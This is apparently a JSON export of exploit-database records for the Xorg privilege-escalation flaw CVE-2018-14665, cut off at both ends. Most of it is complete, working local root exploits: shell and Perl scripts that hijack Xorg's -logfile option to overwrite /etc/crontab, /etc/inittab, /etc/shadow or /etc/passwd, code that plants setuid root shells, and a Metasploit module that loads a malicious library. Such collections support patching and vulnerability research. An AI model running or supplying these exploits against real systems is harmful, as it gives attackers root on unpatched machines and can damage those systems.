Cleaning up /etc/passwd and removing /tmp/wow.ksh \\n\";\n$result = `su wow \"-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0::/:/usr/bin/ksh' >> /etc/passwd\" && rm /tmp/wow.ksh`;\n\nprint \"[-] Done \\n\";\nprint \"[+] 'su wow' for root shell \\n\";", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:06:10", "description": "\nxorg-x11-server 1.20.3 - Privilege Escalation", "edition": 1, "published": "2018-10-30T00:00:00", "title": "xorg-x11-server 1.20.3 - Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-10-30T00:00:00", "id": "EXPLOITPACK:42DE7B337F917EBF2EF618E51199BCA2", "href": "", "sourceData": "# Exploit Title: xorg-x11-server 1.20.3 - Privilege Escalation\n# Date: 2018-10-27\n# Exploit Author: Marco Ivaldi\n# Vendor Homepage: https://www.x.org/\n# Version: xorg-x11-server 1.19.0 - 1.20.2\n# Tested on: OpenBSD 6.3 and 6.4\n# CVE : CVE-2018-14665\n\n# raptor_xorgasm\n\n#!/bin/sh\n\n#\n# raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron\n# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\n#\n# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission \n# check for -modulepath and -logfile options when starting Xorg. X server \n# allows unprivileged users with the ability to log in to the system via \n# physical console to escalate their privileges and run arbitrary code under \n# root privileges (CVE-2018-14665).\n#\n# This exploit targets OpenBSD's cron in order to escalate privileges to\n# root on OpenBSD 6.3 and 6.4. You don't need to be connected to a physical\n# console, it works perfectly on pseudo-terminals connected via SSH as well.\n#\n# See also:\n# https://lists.x.org/archives/xorg-announce/2018-October/002927.html\n# https://www.exploit-db.com/exploits/45697/\n# https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850\n#\n# Usage:\n# blobfish$ chmod +x raptor_xorgasm\n# blobfish$ ./raptor_xorgasm\n# [...]\n# Be patient for a couple of minutes...\n# [...]\n# Don't forget to cleanup and run crontab -e to reload the crontab.\n# -rw-r--r-- 1 root wheel 47327 Oct 27 14:48 /etc/crontab\n# -rwsrwxrwx 1 root wheel 7417 Oct 27 14:50 /usr/local/bin/pwned\n# blobfish# id\n# uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel)\n#\n# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):\n# OpenBSD 6.4 (Xorg 1.19.6) [tested]\n# OpenBSD 6.3 (Xorg 1.19.6) [tested]\n#\n\necho \"raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron\"\necho \"Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\"\n\n# prepare the payload\ncat << EOF > /tmp/xorgasm\ncp /bin/sh /usr/local/bin/pwned # fallback in case gcc is not available\necho \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c\ngcc /tmp/pwned.c -o /usr/local/bin/pwned # most dirs are mounted nosuid\nchmod 4777 /usr/local/bin/pwned\nEOF\nchmod +x /tmp/xorgasm\n\n# trigger the bug\ncd /etc\nXorg -fp \"* * * * * root /tmp/xorgasm\" -logfile crontab :1 &\nsleep 5\npkill Xorg\n\n# run the setuid shell\necho\necho \"Be patient for a couple of minutes...\"\necho\nsleep 120\necho\necho \"Don't forget to cleanup and run crontab -e to reload the crontab.\"\nls -l /etc/crontab*\nls -l /usr/local/bin/pwned\n/usr/local/bin/pwned", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T20:41:02", "description": "\nxorg-x11-server 1.20.3 - modulepath Local Privilege Escalation", "edition": 2, "published": "2018-11-30T00:00:00", "title": "xorg-x11-server 1.20.3 - modulepath Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-0745", "CVE-2018-14665"], "modified": "2018-11-30T00:00:00", "id": "EXPLOITPACK:36340A6356958B8A5C9291F39ED5BA27", "href": "", "sourceData": "#!/bin/sh\n\n#\n# raptor_xorgy - xorg-x11-server LPE via modulepath switch\n# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\n#\n# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission \n# check for -modulepath and -logfile options when starting Xorg. X server \n# allows unprivileged users with the ability to log in to the system via \n# physical console to escalate their privileges and run arbitrary code under \n# root privileges (CVE-2018-14665).\n#\n# This exploit variant triggers the bug in the -modulepath command line switch\n# to load a malicious X11 module in order to escalate privileges to root on\n# vulnerable systems. This technique is less invasive than exploiting the \n# -logfile switch, however the gcc compiler must be present in order for it to\n# work out of the box. Alternatively, you must use a pre-compiled malicious .so\n# compatible with the target system and modify the exploit accordingly.\n#\n# It works very reliably on Solaris 11.4 and should work on most vulnerable\n# Linux distributions (though I haven't tested it). For some reason, it fails to\n# obtain uid 0 on OpenBSD... They might have an additional protection in place.\n#\n# Thanks to @alanc and @nushinde for discussing this alternative vector.\n#\n# See also:\n# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm\n# https://github.com/0xdea/exploits/blob/master/solaris/raptor_solgasm\n# https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html\n# https://nvd.nist.gov/vuln/detail/CVE-2006-0745\n#\n# Usage:\n# raptor@stalker:~$ chmod +x raptor_xorgy\n# raptor@stalker:~$ ./raptor_xorgy\n# [...]\n# root@stalker:~# id\n# uid=0(root) gid=0(root)\n#\n# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2):\n# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5]\n# Oracle Solaris 11 SPARC [untested]\n# CentOS Linux 7 [untested, it should work]\n# Red Hat Enterprise Linux 7 [untested]\n# Ubuntu Linux 18.10 [untested]\n# Ubuntu Linux 18.04 LTS [untested]\n# Ubuntu Linux 16.04 LTS [untested]\n# Debian GNU/Linux 9 [untested]\n# [...]\n#\n\necho \"raptor_xorgy - xorg-x11-server LPE via modulepath switch\"\necho \"Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\"\necho\n\n# prepare the payload\ncat << EOF > /tmp/pwned.c\n_init()\n{\n\tsetuid(0);\n\tsetgid(0);\n\tsystem(\"/bin/bash\");\n}\nEOF\n# libglx.so should be a good target, refer to Xorg logs for other candidates\ngcc -fPIC -shared -nostartfiles -w /tmp/pwned.c -o /tmp/libglx.so\nif [ $? -ne 0 ]; then echo; echo \"error: cannot compile /tmp/pwned.c\"; exit; fi\n\n# trigger the bug\necho \"Got root?\"\nXorg -modulepath \",/tmp\" :1", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2019-10-24T23:13:32", "description": "", "published": "2019-10-22T00:00:00", "type": "packetstorm", "title": "Xorg X11 Server SUID modulepath Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2019-10-22T00:00:00", "id": "PACKETSTORM:154942", "href": "https://packetstormsecurity.com/files/154942/Xorg-X11-Server-SUID-modulepath-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GoodRanking \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \ninclude Msf::Post::File \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::Kernel \ninclude Msf::Post::Linux::System \n \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Xorg X11 Server SUID modulepath Privilege Escalation', \n'Description' => %q{ \nThis module attempts to gain root privileges with SUID Xorg X11 server \nversions 1.19.0 < 1.20.3. \n \nA permission check flaw exists for -modulepath and -logfile options when \nstarting Xorg. This allows unprivileged users that can start the server \nthe ability to elevate privileges and run arbitrary code under root \nprivileges. \n \nThis module has been tested with CentOS 7 (1708). \nCentOS default install will require console auth for the users session. \nXorg must have SUID permissions and may not start if running. \n \nOn successful exploitation artifacts will be created consistant \nwith starting Xorg. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Narendra Shinde', # Discovery and exploit \n'Aaron Ringo', # Metasploit module \n], \n'DisclosureDate' => 'Oct 25 2018', \n'References' => \n[ \n[ 'CVE', '2018-14665' ], \n[ 'BID', '105741' ], \n[ 'EDB', '45697' ], \n[ 'EDB', '45742' ], \n[ 'EDB', '45832' ], \n[ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-another-way-of.html' ] \n], \n'Platform' => %w[linux unix solaris], \n'Arch' => [ARCH_X86, ARCH_X64], \n'SessionTypes' => %w[shell meterpreter], \n'Targets' => \n[ \n['Linux x64', { \n'Platform' => 'linux', \n'Arch' => ARCH_X64 } ], \n['Linux x86', { \n'Platform' => 'linux', \n'Arch' => ARCH_X86 } ], \n['Solaris x86', { \n'Platform' => [ 'solaris', 'unix' ], \n'Arch' => ARCH_SPARC } ], \n['Solaris x64', { \n'Platform' => [ 'solaris', 'unix' ], \n'Arch' => ARCH_SPARC } ], \n], \n'DefaultTarget' => 0)) \n \nregister_advanced_options( \n[ \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]), \nOptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]), \nOptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ]), \nOptString.new('sofile', [ true, 'Xorg shared object name for modulepath', 'libglx.so' ]) \n] \n) \nend \n \n \ndef check \n# linux checks \nuname = cmd_exec \"uname\" \nif uname =~ /linux/i \nvprint_status \"Running additional check for Linux\" \nif datastore['ConsoleLock'] \nuser = cmd_exec \"id -un\" \nunless exist? \"/var/run/console/#{user}\" \nvprint_error \"No console lock for #{user}\" \nreturn CheckCode::Safe \nend \nvprint_good \"Console lock for #{user}\" \nend \nend \n \n# suid program check \nxorg_path = cmd_exec \"command -v Xorg\" \nunless xorg_path.include?(\"Xorg\") \nvprint_error \"Could not find Xorg executable\" \nreturn CheckCode::Safe \nend \nvprint_good \"Xorg path found at #{xorg_path}\" \nunless setuid? xorg_path \nvprint_error \"Xorg binary #{xorg_path} is not SUID\" \nreturn CheckCode::Safe \nend \nvprint_good \"Xorg binary #{xorg_path} is SUID\" \n \nx_version = cmd_exec \"Xorg -version\" \nif x_version.include?(\"Release Date\") \nv = Gem::Version.new(x_version.scan(/\\d\\.\\d+\\.\\d+/).first) \nunless v.between?(Gem::Version.new('1.19.0'), Gem::Version.new('1.20.2')) \nvprint_error \"Xorg version #{v} not supported\" \nreturn CheckCode::Safe \nend \nelsif x_version.include?(\"Fatal server error\") \nvprint_error \"User probably does not have console auth\" \nvprint_error \"Below is Xorg -version output\" \nvprint_error x_version \nreturn CheckCode::Safe \nelse \nvprint_warning \"Could not parse Xorg -version output\" \nreturn CheckCode::Appears \nend \nvprint_good \"Xorg version #{v} is vulnerable\" \n \n# process check for /X \nproc_list = cmd_exec \"ps ax\" \nif proc_list.include?('/X ') \nvprint_warning('Xorg in process list') \nreturn CheckCode::Appears \nend \nvprint_good('Xorg does not appear to be running') \nreturn CheckCode::Vulnerable \nend \n \ndef check_arch_and_compile(path, data) \ncpu = '' \nif target['Arch'] == ARCH_X86 \ncpu = Metasm::Ia32.new \ncompile_with_metasm(cpu, path, data) \nelsif target['Arch'] == ARCH_SPARC \ncompile_with_gcc(path, data) \nelse \ncpu = Metasm::X86_64.new \ncompile_with_metasm(cpu, path, data) \nend \nend \n \ndef compile_with_metasm(cpu, path, data) \nshared_obj = Metasm::ELF.compile_c(cpu, data).encode_string(:lib) \nwrite_file(path, shared_obj) \nregister_file_for_cleanup path \n \nchmod path \nrescue \nprint_status('Failed to compile with Metasm. Falling back to compiling with GCC.') \ncompile_with_gcc(path, data) \nend \n \ndef compile_with_gcc(path, data) \nunless has_gcc? \nfail_with Failure::BadConfig, 'gcc is not installed' \nend \nvprint_good 'gcc is installed' \n \nsrc_path = \"#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(6..10)}.c\" \nwrite_file(src_path, data) \n \ngcc_cmd = \"gcc -fPIC -shared -o #{path} #{src_path} -nostartfiles\" \nif session.type.eql? 'shell' \ngcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\" \nend \noutput = cmd_exec gcc_cmd \nregister_file_for_cleanup src_path \nregister_file_for_cleanup path \n \nunless output.blank? \nprint_error output \nfail_with Failure::Unknown, \"#{src_path} failed to compile\" \nend \n \nchmod path \nend \n \ndef exploit \ncheck_status = check \nif check_status == CheckCode::Appears \nprint_warning 'Could not get version or Xorg process possibly running, may fail' \nelsif check_status == CheckCode::Safe \nfail_with Failure::NotVulnerable, 'Target not vulnerable' \nend \n \nif is_root? \nfail_with Failure::BadConfig, 'This session already has root privileges' \nend \n \nunless writable? datastore['WritableDir'] \nfail_with Failure::BadConfig, \"#{datastore['WritableDir']} is not writable\" \nend \n \nprint_good 'Passed all initial checks for exploit' \n \nmodulepath = datastore['WritableDir'] \nsofile = \"#{modulepath}/#{datastore['sofile']}\" \npscript = \"#{modulepath}/.session-#{rand_text_alphanumeric 5..10}\" \nxdisplay = datastore['Xdisplay'] \n \nstub = %Q^ \nextern int setuid(int); \nextern int setgid(int); \nextern int system(const char *__s); \n \nvoid _init(void) __attribute__((constructor)); \n \nvoid __attribute__((constructor)) _init() { \nsetgid(0); \nsetuid(0); \nsystem(\"#{pscript} &\"); \n} \n^ \nprint_status 'Writing launcher and compiling' \ncheck_arch_and_compile(sofile, stub) \n \n# Uploading \nprint_status 'Uploading your payload, this could take a while' \nif payload.arch.first == 'cmd' \nwrite_file(pscript, payload.encoded) \nelse \nwrite_file(pscript, generate_payload_exe) \nend \nchmod pscript \nregister_file_for_cleanup pscript \n \n \n# Actual exploit with cron overwrite \nprint_status 'Exploiting' \n#Xorg -logfile derp -modulepath ',/tmp' :1 \nxorg_cmd = \"Xorg -modulepath ',#{modulepath}' #{xdisplay} & >/dev/null\" \ncmd_exec xorg_cmd \nRex.sleep 7 \ncmd_exec \"pkill Xorg\" \nRex.sleep 1 \nend \nend \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/154942/xorg_x11_suid_server_modulepath.rb.txt"}, {"lastseen": "2018-10-26T18:18:35", "description": "", "published": "2018-10-25T00:00:00", "type": "packetstorm", "title": "xorg-x11-server Local Root", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-10-25T00:00:00", "id": "PACKETSTORM:149958", "href": "https://packetstormsecurity.com/files/149958/xorg-x11-server-Local-Root.html", "sourceData": "`#!/bin/bash \n# x0rg - Xorg Local Root Exploit \n# Released under the Snitches Get Stitches Public Licence. \n# props to prdelka / fantastic for the shadow vector. \n# Gr33tz to everyone in #lizardhq and elsewhere <3 \n# ~infodox (25/10/2018) \n# FREE LAURI LOVE! \necho \"x0rg\" \necho \"[+] First, we create our shell and library...\" \ncat << EOF > /tmp/libhax.c \n#include <stdio.h> \n#include <sys/types.h> \n#include <unistd.h> \n__attribute__ ((__constructor__)) \nvoid dropshell(void){ \nchown(\"/tmp/rootshell\", 0, 0); \nchmod(\"/tmp/rootshell\", 04755); \nunlink(\"/etc/ld.so.preload\"); \nprintf(\"[+] done!\\n\"); \n} \nEOF \ngcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c \nrm -f /tmp/libhax.c \ncat << EOF > /tmp/rootshell.c \n#include <stdio.h> \nint main(void){ \nsetuid(0); \nsetgid(0); \nseteuid(0); \nsetegid(0); \nexecvp(\"/bin/sh\", NULL, NULL); \n} \nEOF \ngcc -o /tmp/rootshell /tmp/rootshell.c \nrm -f /tmp/rootshell.c \necho \"[+] Hack the planet!\" \ncd /etc; Xorg -fp \"/tmp/libhax.so\" -logfile ld.so.preload :1; \nmount # arbritary setuid we run to pop root \necho \"[+] Tidy up a bit...\" \nrm -f /tmp/libhax.so \necho \"[<3] :PPpPpPpOpr000000t!\" \n/tmp/rootshell \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149958/xorgx11local-exec.txt"}, {"lastseen": "2019-01-15T11:05:51", "description": "", "published": "2019-01-14T00:00:00", "type": "packetstorm", "title": "xorg-x11-server Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2019-01-14T00:00:00", "id": "PACKETSTORM:151136", "href": "https://packetstormsecurity.com/files/151136/xorg-x11-server-Local-Privilege-Escalation.html", "sourceData": "`#!/bin/sh \n \n# Exploit Title: xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris11 inittab) \n# Date: 2018-11-25 \n# Exploit Author: Marco Ivaldi \n# Vendor Homepage: https://www.x.org/ \n# Version: xorg-x11-server 1.19.0 - 1.20.2 \n# Tested on: Oracle Solaris 11.4 \n# CVE : CVE-2018-14665 \n \n# \n# raptor_solgasm - xorg-x11-server LPE via Solaris inittab \n# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info> \n# \n# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission \n# check for -modulepath and -logfile options when starting Xorg. X server \n# allows unprivileged users with the ability to log in to the system via \n# physical console to escalate their privileges and run arbitrary code under \n# root privileges (CVE-2018-14665). \n# \n# \"In video games, this is what they call respawning\" -- Nick Sax \n# \n# This exploit targets /etc/inittab in order to escalate privileges to root \n# on Solaris 11 (no need to be connected to a physical console). Messing with \n# inittab is considerably dangerous and you may trash your system, however the \n# other potential vectors (cron, passwd, sudo, ld.config, etc.) either don't \n# work or are even worse. Still, DON'T RUN UNLESS YOU KNOW WHAT YOU ARE DOING! \n# \n# See also: \n# https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm \n# \n# Usage: \n# raptor@stalker:~$ chmod +x raptor_solgasm \n# raptor@stalker:~$ ./raptor_solgasm \n# [...] \n# Now please be patient for a few minutes... \n# [...] \n# To avoid trashing the system, remember to: mv /etc/inittab.old /etc/inittab \n# -rw-r--r-- 1 root staff 13870 nov 24 22:01 /etc/inittab \n# -rw-r--r-- 1 root sys 967 nov 24 20:01 /etc/inittab.old \n# -rwsrwxrwx 1 root root 1249080 nov 24 22:05 /tmp/pwned \n# root@stalker:/etc# id \n# uid=0(root) gid=0(root) \n# \n# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2): \n# Oracle Solaris 11 X86 [tested on 11.4.0.0.1.15.0 with Xorg 1.19.5] \n# Oracle Solaris 11 SPARC [untested] \n# \n \necho \"raptor_solgasm - xorg-x11-server LPE via Solaris inittab\" \necho \"Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>\" \n \n# prepare the payload \ncat << EOF > /tmp/solgasm \ncp /bin/zsh /tmp/pwned # fallback in case gcc is not available \necho \"main(){setuid(0);setgid(0);system(\\\"/bin/bash\\\");}\" > /tmp/pwned.c \ngcc /tmp/pwned.c -o /tmp/pwned \nchmod 4777 /tmp/pwned \nEOF \nchmod +x /tmp/solgasm \n \n# trigger the bug \nPWN=x$(cat /dev/urandom | env LC_CTYPE=C tr -dc '[:lower:]' | fold -3 | head -1) \ncd /etc \nXorg -fp \"${PWN}::respawn:/tmp/solgasm\" -logfile inittab :1 & \nsleep 5 \npkill Xorg \n \n# run the setuid shell \necho \necho \"Now please be patient for a few minutes...\" \necho \nuntil [ -u /tmp/pwned ]; do sleep 1; done \necho \"To avoid trashing the system remember to mv /etc/inittab.old /etc/inittab\" \nls -l /etc/inittab* \nls -l /tmp/pwned \nsleep 1 \n/tmp/pwned \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/151136/xorgx11-escalate.txt"}, {"lastseen": "2018-12-06T10:32:23", "description": "", "published": "2018-12-05T00:00:00", "type": "packetstorm", "title": "Xorg X11 Server (AIX) Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-12-05T00:00:00", "id": "PACKETSTORM:150620", "href": "https://packetstormsecurity.com/files/150620/Xorg-X11-Server-AIX-Local-Privilege-Escalation.html", "sourceData": "`# Exploit Title: AIX Xorg X11 Server - Local Privilege Escalation \n# Date: 29/11/2018 \n# Exploit Author: @0xdono \n# Original Discovery and Exploit: Narendra Shinde \n# Vendor Homepage: https://www.x.org/ \n# Platform: AIX \n# Version: X Window System Version 7.1.1 \n# Fileset: X11.base.rte < 7.1.5.32 \n# Tested on: AIX 7.1 (6.x to 7.x should be vulnerable) \n# CVE: CVE-2018-14665 \n# \n# Explanation: \n# Incorrect command-line parameter validation in the Xorg X server can \n# lead to privilege elevation and/or arbitrary files overwrite, when the \n# X server is running with elevated privileges. \n# The -logfile argument can be used to overwrite arbitrary files in the \n# file system, due to incorrect checks in the parsing of the option. \n# \n# This is a port of the OpenBSD X11 Xorg exploit to run on AIX. \n# It overwrites /etc/passwd in order to create a new user with root privile= \nges.=20 \n# All currently logged in users need to be included when /etc/passwd is ove= \nrwritten, \n# else AIX will throw 'Cannot get \"LOGNAME\" variable' when attempting to ch= \nange user. \n# The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX= \n, \n# and is replaced by '-config'. \n# ksh93 is used for ANSI-C quoting, and is installed by default on AIX. \n# \n# IBM has not yet released a patch as of 29/11/2018. \n# \n# See also: \n# https://lists.x.org/archives/xorg-announce/2018-October/002927.html \n# https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html \n# https://github.com/dzflack/exploits/blob/master/aix/aixxorg.pl \n# \n# Usage: \n# $ oslevel -s \n# 7100-04-00-0000 \n# $ Xorg -version \n# =20 \n# X Window System Version 7.1.1 \n# Release Date: 12 May 2006 \n# X Protocol Version 11, Revision 0, Release 7.1.1 \n# Build Operating System: AIX IBM \n# Current Operating System: AIX sovma470 1 7 00C3C6F54C00 \n# Build Date: 07 July 2006 \n# Before reporting problems, check http://wiki.x.org \n# to make sure that you have the latest version. \n# Module Loader present \n# $ id \n# uid=3D16500(nmyo) gid=3D1(staff) \n# $ perl aixxorg.pl \n# [+] AIX X11 server local root exploit \n# [-] Checking for Xorg and ksh93=20 \n# [-] Opening /etc/passwd=20 \n# [-] Retrieving currently logged in users=20 \n# [-] Generating Xorg command=20 \n# [-] Opening /tmp/wow.ksh=20 \n# [-] Writing Xorg command to /tmp/wow.ksh=20 \n# [-] Backing up /etc/passwd to /tmp/passwd.backup=20 \n# [-] Making /tmp/wow.ksh executable=20 \n# [-] Executing /tmp/wow.ksh=20 \n# [-] Cleaning up /etc/passwd and removing /tmp/wow.ksh=20 \n# [-] Done=20 \n# [+] 'su wow' for root shell=20 \n# $ su wow \n# # id \n# uid=3D0(root) gid=3D0(system) \n# # whoami \n# root \n \n#!/usr/bin/perl \nprint \"[+] AIX X11 server local root exploit\\n\"; \n \n# Check Xorg is in path \nprint \"[-] Checking for Xorg and ksh93 \\n\"; \nchomp($xorg =3D `command -v Xorg`); \nif ($xorg eq \"\"){=20 \nprint \"[X] Can't find Xorg binary, try hardcode it? exiting... \\n\"; \nexit; \n} \n \n# Check ksh93 is in path \nchomp($ksh =3D `command -v ksh93`); \nif ($ksh eq \"\"){ \nprint \"[X] Can't find ksh93 binary, try hardcode it? exiting... \\n\"; \nexit; \n} \n \n# Read in /etc/passwd \nprint \"[-] Opening /etc/passwd \\n\"; \nopen($passwd_fh, '<', \"/etc/passwd\"); \nchomp(@passwd_array =3D <$passwd_fh>); \nclose($passwd_fh); \n \n# Retrieve currently logged in users \nprint \"[-] Retrieving currently logged in users \\n\"; \n@users =3D `who | cut -d' ' -f1 | sort | uniq`; \nchomp(@users); \n \n# For all logged in users, add their current passwd entry to string \n# that will be used to overwrite passwd \n$users_logged_in_passwd =3D ''; \nforeach my $user (@users) \n{ \n$user .=3D \":\"; \nforeach my $line (@passwd_array) \n{ \nif (index($line, $user) =3D=3D 0) { \n$users_logged_in_passwd =3D $users_logged_in_passwd . '\\n' . $l= \nine; \n} \n} \n} \n \n# Use '-config' as '-fp' (which is used in the original BSD exploit) is not= \nwritten to log \nprint \"[-] Generating Xorg command \\n\"; \n$blob =3D '-config ' . '$\\'' . $users_logged_in_passwd . '\\nwow::0:0::/:/us= \nr/bin/ksh\\n#' . '\\''; \n \nprint \"[-] Opening /tmp/wow.ksh \\n\";=09=09 \nopen($fr, '>', \"/tmp/wow.ksh\"); \n \n# Use ksh93 for ANSI-C quoting \nprint \"[-] Writing Xorg command to /tmp/wow.ksh \\n\"; \nprint $fr '#!' . \"$ksh\\n\"; \nprint $fr \"$xorg $blob -logfile ../etc/passwd :1 > /dev/null 2>&1 \\n\"; \nclose $fr; \n \n# Backup passwd=20 \nprint \"[-] Backing up /etc/passwd to /tmp/passwd.backup \\n\"; \nsystem(\"cp /etc/passwd /tmp/passwd.backup\"); \n \n# Make script executable and run it \nprint \"[-] Making /tmp/wow.ksh executable \\n\"; \nsystem(\"chmod +x /tmp/wow.ksh\"); \nprint \"[-] Executing /tmp/wow.ksh \\n\"; \nsystem(\"/tmp/wow.ksh\"); \n \n# Replace overwritten passwd with: original passwd + wow user \nprint \"[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \\n\"; \n$result =3D `su wow \"-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0= \n::/:/usr/bin/ksh' >> /etc/passwd\" && rm /tmp/wow.ksh`; \n \nprint \"[-] Done \\n\"; \nprint \"[+] 'su wow' for root shell \\n\"; \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150620/xorgx11aix-escalate.txt"}, {"lastseen": "2018-10-26T18:18:35", "description": "", "published": "2018-10-25T00:00:00", "type": "packetstorm", "title": "xorg-x11-server Local Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-10-25T00:00:00", "id": "PACKETSTORM:149957", "href": "https://packetstormsecurity.com/files/149957/xorg-x11-server-Local-Privilege-Escalation.html", "sourceData": "`#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet \n \ncd /etc; Xorg -fp \"root::16431:0:99999:7:::\" -logfile shadow :1;su \n \nOverwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected. \n \n \n \n \n \n#!/bin/sh \n# local privilege escalation in X11 currently \n# unpatched in OpenBSD 6.4 stable - exploit \n# uses cve-2018-14665 to overwrite files as root. \n# Impacts Xorg 1.19.0 - 1.20.2 which ships setuid \n# and vulnerable in default OpenBSD. \n# \n# - https://hacker.house \necho [+] OpenBSD 6.4-stable local root exploit \ncd /etc \nXorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 & \nsleep 5 \npkill Xorg \necho [-] dont forget to mv and chmod /etc/master.passwd.old back \necho [+] type 'Password1' and hit enter for root \nsu - \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149957/xorgx11-exec.txt"}, {"lastseen": "2018-10-31T10:17:28", "description": "", "published": "2018-10-31T00:00:00", "type": "packetstorm", "title": "xorg-x11-server 1.20.3 Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-14665"], "modified": "2018-10-31T00:00:00", "id": "PACKETSTORM:150042", "href": "https://packetstormsecurity.com/files/150042/xorg-x11-server-1.20.3-Privilege-Escalation.html", "sourceData": "`# Exploit Title: xorg-x11-server 1.20.3 - Privilege Escalation \n# Date: 2018-10-27 \n# Exploit Author: Marco Ivaldi \n# Vendor Homepage: https://www.x.org/ \n# Version: xorg-x11-server 1.19.0 - 1.20.2 \n# Tested on: OpenBSD 6.3 and 6.4 \n# CVE : CVE-2018-14665 \n \n# raptor_xorgasm \n \n#!/bin/sh \n \n# \n# raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron \n# Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info> \n# \n# A flaw was found in xorg-x11-server before 1.20.3. An incorrect permission \n# check for -modulepath and -logfile options when starting Xorg. X server \n# allows unprivileged users with the ability to log in to the system via \n# physical console to escalate their privileges and run arbitrary code under \n# root privileges (CVE-2018-14665). \n# \n# This exploit targets OpenBSD's cron in order to escalate privileges to \n# root on OpenBSD 6.3 and 6.4. You don't need to be connected to a physical \n# console, it works perfectly on pseudo-terminals connected via SSH as well. \n# \n# See also: \n# https://lists.x.org/archives/xorg-announce/2018-October/002927.html \n# https://www.exploit-db.com/exploits/45697/ \n# https://gist.github.com/0x27/d8aae5de44ed385ff2a3d80196907850 \n# \n# Usage: \n# blobfish$ chmod +x raptor_xorgasm \n# blobfish$ ./raptor_xorgasm \n# [...] \n# Be patient for a couple of minutes... \n# [...] \n# Don't forget to cleanup and run crontab -e to reload the crontab. \n# -rw-r--r-- 1 root wheel 47327 Oct 27 14:48 /etc/crontab \n# -rwsrwxrwx 1 root wheel 7417 Oct 27 14:50 /usr/local/bin/pwned \n# blobfish# id \n# uid=0(root) gid=0(wheel) groups=1000(raptor), 0(wheel) \n# \n# Vulnerable platforms (setuid Xorg 1.19.0 - 1.20.2): \n# OpenBSD 6.4 (Xorg 1.19.6) [tested] \n# OpenBSD 6.3 (Xorg 1.19.6) [tested] \n# \n \necho \"raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron\" \necho \"Copyright (c) 2018 Marco Ivaldi 